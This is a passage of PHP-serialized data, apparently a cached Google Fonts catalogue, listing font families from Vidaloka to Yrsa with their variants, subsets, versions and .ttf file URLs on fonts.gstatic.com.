http://fonts.gstatic.com/s/vidaloka/v18/7cHrv4c3ipenMKlEass8yn4hnCci.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1400;O:8:\"stdClass\":8:{s:6:\"family\";s:4:\"Viga\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:63:\"http://fonts.gstatic.com/s/viga/v14/xMQbuFFdSaiX_QIjD4e2OX8.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1401;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Voces\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:65:\"http://fonts.gstatic.com/s/voces/v20/-F6_fjJyLyU8d4PBBG7YpzlJ.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1402;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Volkhov\";s:8:\"variants\";a:4:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":4:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/volkhov/v17/SlGQmQieoJcKemNeQTIOhHxzcD0.ttf\";s:6:\"italic\";s:73:\"http://fonts.gstatic.com/s/volkhov/v17/SlGSmQieoJcKemNecTAEgF52YD0NYw.ttf\";s:3:\"700\";s:74:\"http://fonts.gstatic.com/s/volkhov/v17/SlGVmQieoJcKemNeeY4hoHRYbDQUego.ttf\";s:9:\"700italic\";s:77:\"http://fonts.gstatic.com/s/volkhov/v17/SlGXmQieoJcKemNecTA8PHFSaBYRagrQrA.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1403;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Vollkorn\";s:8:\"variants\";a:12:{i:0;s:7:\"regular\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:3:\"800\";i:5;s:3:\"900\";i:6;s:6:\"italic\";i:7;s:9:\"500italic\";i:8;s:9:\"600italic\";i:9;s:9:\"700italic\";i:10;s:9:\"800italic\";i:11;s:9:\"900italic\";}s:7:\"subsets\";a:6:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"greek\";i:3;s:5:\"latin\";i:4;s:9:\"latin-ext\";i:5;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-08-24\";s:5:\"files\";O:8:\"stdClass\":12:{s:7:\"regular\";s:90:\"http://fonts.gstatic.com/s/vollkorn/v21/0ybgGDoxxrvAnPhYGzMlQLzuMasz6Df2MHGuGWOdEbD63w.ttf\";s:3:\"500\";s:90:\"http://fonts.gstatic.com/s/vollkorn/v21/0ybgGDoxxrvAnPhYGzMlQLzuMasz6Df2AnGuGWOdEbD63w.ttf\";s:3:\"600\";s:90:\"http://fonts.gstatic.com/s/vollkorn/v21/0ybgGDoxxrvAnPhYGzMlQLzuMasz6Df27nauGWOdEbD63w.ttf\";s:3:\"700\";s:90:\"http://fonts.gstatic.com/s/vollkorn/v21/0ybgGDoxxrvAnPhYGzMlQLzuMasz6Df213auGWOdEbD63w.ttf\";s:3:\"800\";s:90:\"http://fonts.gstatic.com/s/vollkorn/v21/0ybgGDoxxrvAnPhYGzMlQLzuMasz6Df2sHauGWOdEbD63w.ttf\";s:3:\"900\";s:90:\"http://fonts.gstatic.com/s/vollkorn/v21/0ybgGDoxxrvAnPhYGzMlQLzuMasz6Df2mXauGWOdEbD63w.ttf\";s:6:\"italic\";s:92:\"http://fonts.gstatic.com/s/vollkorn/v21/0ybuGDoxxrvAnPhYGxksckM2WMCpRjDj-DJGWmmZM7Xq34g9.ttf\";s:9:\"500italic\";s:92:\"http://fonts.gstatic.com/s/vollkorn/v21/0ybuGDoxxrvAnPhYGxksckM2WMCpRjDj-DJ0WmmZM7Xq34g9.ttf\";s:9:\"600italic\";s:92:\"http://fonts.gstatic.com/s/vollkorn/v21/0ybuGDoxxrvAnPhYGxksckM2WMCpRjDj-DKYXWmZM7Xq34g9.ttf\";s:9:\"700italic\";s:92:\"http://fonts.gstatic.com/s/vollkorn/v21/0ybuGDoxxrvAnPhYGxksckM2WMCpRjDj-DKhXWmZM7Xq34g9.ttf\";s:9:\"800italic\";s:92:\"http://fonts.gstatic.com/s/vollkorn/v21/0ybuGDoxxrvAnPhYGxksckM2WMCpRjDj-DLGXWmZM7Xq34g9.ttf\";s:9:\"900italic\";s:92:\"http://fonts.gstatic.com/s/vollkorn/v21/0ybuGDoxxrvAnPhYGxksckM2WMCpRjDj-DLvXWmZM7Xq34g9.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1404;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Vollkorn SC\";s:8:\"variants\";a:4:{i:0;s:7:\"regular\";i:1;s:3:\"600\";i:2;s:3:\"700\";i:3;s:3:\"900\";}s:7:\"subsets\";a:5:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"latin\";i:3;s:9:\"latin-ext\";i:4;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v11\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":4:{s:7:\"regular\";s:78:\"http://fonts.gstatic.com/s/vollkornsc/v11/j8_v6-zQ3rXpceZj9cqnVhF5NH-iSq_E.ttf\";s:3:\"600\";s:82:\"http://fonts.gstatic.com/s/vollkornsc/v11/j8_y6-zQ3rXpceZj9cqnVimhGluqYbPN5Yjn.ttf\";s:3:\"700\";s:82:\"http://fonts.gstatic.com/s/vollkornsc/v11/j8_y6-zQ3rXpceZj9cqnVinFG1uqYbPN5Yjn.ttf\";s:3:\"900\";s:82:\"http://fonts.gstatic.com/s/vollkornsc/v11/j8_y6-zQ3rXpceZj9cqnVin9GVuqYbPN5Yjn.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1405;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Voltaire\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:72:\"http://fonts.gstatic.com/s/voltaire/v15/1Pttg8PcRfSblAvGvQooYKVnBOif.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1406;O:8:\"stdClass\":8:{s:6:\"family\";s:15:\"Vujahday Script\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v3\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:87:\"http://fonts.gstatic.com/s/vujahdayscript/v3/RWmQoKGA8fEkrIPtSZ3_J7er2dUiDEtvAlaMKw.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1407;O:8:\"stdClass\":8:{s:6:\"family\";s:23:\"Waiting for the Sunrise\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:104:\"http://fonts.gstatic.com/s/waitingforthesunrise/v16/WBL1rFvOYl9CEv2i1mO6KUW8RKWJ2zoXoz5JsYZQ9h_ZYk5J.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1408;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Wallpoet\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:72:\"http://fonts.gstatic.com/s/wallpoet/v16/f0X10em2_8RnXVVdUNbu7cXP8L8G.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1409;O:8:\"stdClass\":8:{s:6:\"family\";s:15:\"Walter Turncoat\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v19\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:88:\"http://fonts.gstatic.com/s/walterturncoat/v19/snfys0Gs98ln43n0d-14ULoToe67YB2dQ5ZPqQ.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1410;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Warnes\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v22\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/warnes/v22/pONn1hc0GsW6sW5OpiC2o6Lkqg.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1411;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Water Brush\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v2\";s:12:\"lastModified\";s:10:\"2022-05-10\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:77:\"http://fonts.gstatic.com/s/waterbrush/v2/AYCPpXPqc8cJWLhp4hywKHJq7PKP5Z_G.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1412;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Waterfall\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v3\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:74:\"http://fonts.gstatic.com/s/waterfall/v3/MCoRzAfo293fACdFKcwY2rH8D_EZwA.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1413;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Wellfleet\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:75:\"http://fonts.gstatic.com/s/wellfleet/v20/nuF7D_LfQJb3VYgX6eyT42aLDhO2HA.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1414;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Wendy One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:74:\"http://fonts.gstatic.com/s/wendyone/v14/2sDcZGJOipXfgfXV5wgDb2-4C7wFZQ.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1415;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Whisper\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v2\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:69:\"http://fonts.gstatic.com/s/whisper/v2/q5uHsoqtKftx74K9milCBxxdmYU.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1416;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"WindSong\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:3:\"500\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v7\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:71:\"http://fonts.gstatic.com/s/windsong/v7/KR1WBsyu-P-GFEW57r95HdG6vjH3.ttf\";s:3:\"500\";s:75:\"http://fonts.gstatic.com/s/windsong/v7/KR1RBsyu-P-GFEW57oeNNPWylS3-jVXm.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1417;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Wire One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v24\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:71:\"http://fonts.gstatic.com/s/wireone/v24/qFdH35Wah5htUhV75WGiWdrCwwcJ.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1418;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Work Sans\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";i:9;s:9:\"100italic\";i:10;s:9:\"200italic\";i:11;s:9:\"300italic\";i:12;s:6:\"italic\";i:13;s:9:\"500italic\";i:14;s:9:\"600italic\";i:15;s:9:\"700italic\";i:16;s:9:\"800italic\";i:17;s:9:\"900italic\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v18\";s:12:\"lastModified\";s:10:\"2022-08-24\";s:5:\"files\";O:8:\"stdClass\":18:{s:3:\"100\";s:91:\"http://fonts.gstatic.com/s/worksans/v18/QGY_z_wNahGAdqQ43RhVcIgYT2Xz5u32K0nWNigDp6_cOyA.ttf\";s:3:\"200\";s:91:\"http://fonts.gstatic.com/s/worksans/v18/QGY_z_wNahGAdqQ43RhVcIgYT2Xz5u32K8nXNigDp6_cOyA.ttf\";s:3:\"300\";s:91:\"http://fonts.gstatic.com/s/worksans/v18/QGY_z_wNahGAdqQ43RhVcIgYT2Xz5u32KxfXNigDp6_cOyA.ttf\";s:7:\"regular\";s:91:\"http://fonts.gstatic.com/s/worksans/v18/QGY_z_wNahGAdqQ43RhVcIgYT2Xz5u32K0nXNigDp6_cOyA.ttf\";s:3:\"500\";s:91:\"http://fonts.gstatic.com/s/worksans/v18/QGY_z_wNahGAdqQ43RhVcIgYT2Xz5u32K3vXNigDp6_cOyA.ttf\";s:3:\"600\";s:91:\"http://fonts.gstatic.com/s/worksans/v18/QGY_z_wNahGAdqQ43RhVcIgYT2Xz5u32K5fQNigDp6_cOyA.ttf\";s:3:\"700\";s:91:\"http://fonts.gstatic.com/s/worksans/v18/QGY_z_wNahGAdqQ43RhVcIgYT2Xz5u32K67QNigDp6_cOyA.ttf\";s:3:\"800\";s:91:\"http://fonts.gstatic.com/s/worksans/v18/QGY_z_wNahGAdqQ43RhVcIgYT2Xz5u32K8nQNigDp6_cOyA.ttf\";s:3:\"900\";s:91:\"http://fonts.gstatic.com/s/worksans/v18/QGY_z_wNahGAdqQ43RhVcIgYT2Xz5u32K-DQNigDp6_cOyA.ttf\";s:9:\"100italic\";s:94:\"http://fonts.gstatic.com/s/worksans/v18/QGY9z_wNahGAdqQ43Rh_ebrnlwyYfEPxPoGU3moJo43ZKyDSQQ.ttf\";s:9:\"200italic\";s:94:\"http://fonts.gstatic.com/s/worksans/v18/QGY9z_wNahGAdqQ43Rh_ebrnlwyYfEPxPoGUXmsJo43ZKyDSQQ.ttf\";s:9:\"300italic\";s:94:\"http://fonts.gstatic.com/s/worksans/v18/QGY9z_wNahGAdqQ43Rh_ebrnlwyYfEPxPoGUgGsJo43ZKyDSQQ.ttf\";s:6:\"italic\";s:94:\"http://fonts.gstatic.com/s/worksans/v18/QGY9z_wNahGAdqQ43Rh_ebrnlwyYfEPxPoGU3msJo43ZKyDSQQ.ttf\";s:9:\"500italic\";s:94:\"http://fonts.gstatic.com/s/worksans/v18/QGY9z_wNahGAdqQ43Rh_ebrnlwyYfEPxPoGU7GsJo43ZKyDSQQ.ttf\";s:9:\"600italic\";s:94:\"http://fonts.gstatic.com/s/worksans/v18/QGY9z_wNahGAdqQ43Rh_ebrnlwyYfEPxPoGUAGwJo43ZKyDSQQ.ttf\";s:9:\"700italic\";s:94:\"http://fonts.gstatic.com/s/worksans/v18/QGY9z_wNahGAdqQ43Rh_ebrnlwyYfEPxPoGUOWwJo43ZKyDSQQ.ttf\";s:9:\"800italic\";s:94:\"http://fonts.gstatic.com/s/worksans/v18/QGY9z_wNahGAdqQ43Rh_ebrnlwyYfEPxPoGUXmwJo43ZKyDSQQ.ttf\";s:9:\"900italic\";s:94:\"http://fonts.gstatic.com/s/worksans/v18/QGY9z_wNahGAdqQ43Rh_ebrnlwyYfEPxPoGUd2wJo43ZKyDSQQ.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1419;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Xanh Mono\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:74:\"http://fonts.gstatic.com/s/xanhmono/v17/R70YjykVmvKCep-vWhSYmACQXzLhTg.ttf\";s:6:\"italic\";s:76:\"http://fonts.gstatic.com/s/xanhmono/v17/R70ejykVmvKCep-vWhSomgqUfTfxTo24.ttf\";}s:8:\"category\";s:9:\"monospace\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1420;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Yaldevi\";s:8:\"variants\";a:6:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:7:\"regular\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:7:\"sinhala\";}s:7:\"version\";s:2:\"v8\";s:12:\"lastModified\";s:10:\"2022-08-24\";s:5:\"files\";O:8:\"stdClass\":6:{s:3:\"200\";s:86:\"http://fonts.gstatic.com/s/yaldevi/v8/cY9afj6VW0NMrDWtDNzCOwlPMq9SLpfxJzvobxLCBJkS.ttf\";s:3:\"300\";s:86:\"http://fonts.gstatic.com/s/yaldevi/v8/cY9afj6VW0NMrDWtDNzCOwlPMq9SLpcvJzvobxLCBJkS.ttf\";s:7:\"regular\";s:86:\"http://fonts.gstatic.com/s/yaldevi/v8/cY9afj6VW0NMrDWtDNzCOwlPMq9SLpdxJzvobxLCBJkS.ttf\";s:3:\"500\";s:86:\"http://fonts.gstatic.com/s/yaldevi/v8/cY9afj6VW0NMrDWtDNzCOwlPMq9SLpdDJzvobxLCBJkS.ttf\";s:3:\"600\";s:86:\"http://fonts.gstatic.com/s/yaldevi/v8/cY9afj6VW0NMrDWtDNzCOwlPMq9SLpevIDvobxLCBJkS.ttf\";s:3:\"700\";s:86:\"http://fonts.gstatic.com/s/yaldevi/v8/cY9afj6VW0NMrDWtDNzCOwlPMq9SLpeWIDvobxLCBJkS.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1421;O:8:\"stdClass\":8:{s:6:\"family\";s:17:\"Yanone Kaffeesatz\";s:8:\"variants\";a:6:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:7:\"regular\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";}s:7:\"subsets\";a:4:{i:0;s:8:\"cyrillic\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";i:3;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v24\";s:12:\"lastModified\";s:10:\"2022-08-24\";s:5:\"files\";O:8:\"stdClass\":6:{s:3:\"200\";s:110:\"http://fonts.gstatic.com/s/yanonekaffeesatz/v24/3y9I6aknfjLm_3lMKjiMgmUUYBs04aUXNxt9gW2LIftodtWpcGuLCnXkVA.ttf\";s:3:\"300\";s:110:\"http://fonts.gstatic.com/s/yanonekaffeesatz/v24/3y9I6aknfjLm_3lMKjiMgmUUYBs04aUXNxt9gW2LIftoqNWpcGuLCnXkVA.ttf\";s:7:\"regular\";s:110:\"http://fonts.gstatic.com/s/yanonekaffeesatz/v24/3y9I6aknfjLm_3lMKjiMgmUUYBs04aUXNxt9gW2LIfto9tWpcGuLCnXkVA.ttf\";s:3:\"500\";s:110:\"http://fonts.gstatic.com/s/yanonekaffeesatz/v24/3y9I6aknfjLm_3lMKjiMgmUUYBs04aUXNxt9gW2LIftoxNWpcGuLCnXkVA.ttf\";s:3:\"600\";s:110:\"http://fonts.gstatic.com/s/yanonekaffeesatz/v24/3y9I6aknfjLm_3lMKjiMgmUUYBs04aUXNxt9gW2LIftoKNKpcGuLCnXkVA.ttf\";s:3:\"700\";s:110:\"http://fonts.gstatic.com/s/yanonekaffeesatz/v24/3y9I6aknfjLm_3lMKjiMgmUUYBs04aUXNxt9gW2LIftoEdKpcGuLCnXkVA.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1422;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Yantramanav\";s:8:\"variants\";a:6:{i:0;s:3:\"100\";i:1;s:3:\"300\";i:2;s:7:\"regular\";i:3;s:3:\"500\";i:4;s:3:\"700\";i:5;s:3:\"900\";}s:7:\"subsets\";a:3:{i:0;s:10:\"devanagari\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v11\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":6:{s:3:\"100\";s:82:\"http://fonts.gstatic.com/s/yantramanav/v11/flU-Rqu5zY00QEpyWJYWN5-QXeNzDB41rZg.ttf\";s:3:\"300\";s:83:\"http://fonts.gstatic.com/s/yantramanav/v11/flUhRqu5zY00QEpyWJYWN59Yf8NZIhI8tIHh.ttf\";s:7:\"regular\";s:79:\"http://fonts.gstatic.com/s/yantramanav/v11/flU8Rqu5zY00QEpyWJYWN6f0V-dRCQ41.ttf\";s:3:\"500\";s:83:\"http://fonts.gstatic.com/s/yantramanav/v11/flUhRqu5zY00QEpyWJYWN58AfsNZIhI8tIHh.ttf\";s:3:\"700\";s:83:\"http://fonts.gstatic.com/s/yantramanav/v11/flUhRqu5zY00QEpyWJYWN59IeMNZIhI8tIHh.ttf\";s:3:\"900\";s:83:\"http://fonts.gstatic.com/s/yantramanav/v11/flUhRqu5zY00QEpyWJYWN59wesNZIhI8tIHh.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1423;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Yatra One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:10:\"devanagari\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:74:\"http://fonts.gstatic.com/s/yatraone/v14/C8ch4copsHzj8p7NaF0xw1OBbRDvXw.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1424;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Yellowtail\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v18\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:77:\"http://fonts.gstatic.com/s/yellowtail/v18/OZpGg_pnoDtINPfRIlLotlzNwED-b4g.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1425;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Yeon Sung\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:6:\"korean\";i:1;s:5:\"latin\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:74:\"http://fonts.gstatic.com/s/yeonsung/v20/QldMNTpbohAGtsJvUn6xSVNazqx2xg.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1426;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Yeseva One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:5:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"latin\";i:3;s:9:\"latin-ext\";i:4;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:76:\"http://fonts.gstatic.com/s/yesevaone/v20/OpNJno4ck8vc-xYpwWWxpipfWhXD00c.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1427;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Yesteryear\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:77:\"http://fonts.gstatic.com/s/yesteryear/v14/dg4g_p78rroaKl8kRKo1r7wHTwonmyw.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1428;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Yomogi\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:5:{i:0;s:8:\"cyrillic\";i:1;s:8:\"japanese\";i:2;s:5:\"latin\";i:3;s:9:\"latin-ext\";i:4;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v8\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:67:\"http://fonts.gstatic.com/s/yomogi/v8/VuJwdNrS2ZL7rpoPWIz5NIh-YA.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1429;O:8:\"stdClass\":8:{s:6:\"family\";s:4:\"Yrsa\";s:8:\"variants\";a:10:{i:0;s:3:\"300\";i:1;s:7:\"regular\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";i:5;s:9:\"300italic\";i:6;s:6:\"italic\";i:7;s:9:\"500italic\";i:8;s:9:\"600italic\";i:9;s:9:\"700italic\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese